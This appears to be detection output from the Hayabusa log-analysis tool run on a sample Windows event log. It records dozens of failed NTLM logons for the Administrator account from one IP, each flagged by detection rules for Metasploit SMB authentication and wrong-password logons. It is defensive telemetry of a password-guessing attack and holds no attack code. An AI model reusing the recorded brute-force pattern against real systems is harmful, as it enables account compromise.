+2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WUCyUQgbUqwaLj3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9nLhDbcvmVBZp4f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BBWo1zDdjaAeGDWW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vjHRFk2flmzzd1zg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 53HYxs9s7fpP1y6V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tluqXKvVooP7VNyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 43m0nfi5tiv4TpSB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qjPyJXl984vViV6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MomQ8Yt51VsMiO4p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LJYCi5r2otMHxA8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4oUSkMBI8SGDLwYC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j1x3lyRjxn73KITB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gh05BhGpwq1ho62a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bxj6ITbiciyRNLbF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uev2mjCaqHjm6NYi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L4WU383o9E5JyM5V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lfMv0lsoiRnTCFXe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XL4ahBqUyGeTONkE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8hJ888Kmyi6KqIPn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VZ6sfYMHuygnMdY2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XkuSlyTNc5OOoUtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Z13YmupcMato8Sd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JedeMnLPnRJEwhZ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmy0c0wFheIRzSo4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sskKdqku5S0f1sWm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 15Qg0nCXNj7Ub1Sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZD6iuaqv70k69G87  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gk3UuqTJmvH1snmN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zaw9iF5mJlyygdnB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Sr5PZAd1qMc7hi3c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l5xbQtyueVq3fJSG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g2nP0zz2ofBxTGw6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SYJheREJmEwj0791  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: exglD9fnLwaqwRZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8bSAU1QjasDAsmry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cfnrtXR7evQBbaOw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KYAwjW99chcntPsQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rG2PYfOTfT7QvbPu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FojDtfDNXq0gQfYu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SUTT0QycbFtyJfNL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gcbv1lrcYdT9Wuli  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pjdFfvCCfGXo7FUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rzqGdWlGglLQx6Z4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3Rt80PMk70sVqbk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: okunzcEHnxUml4SG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
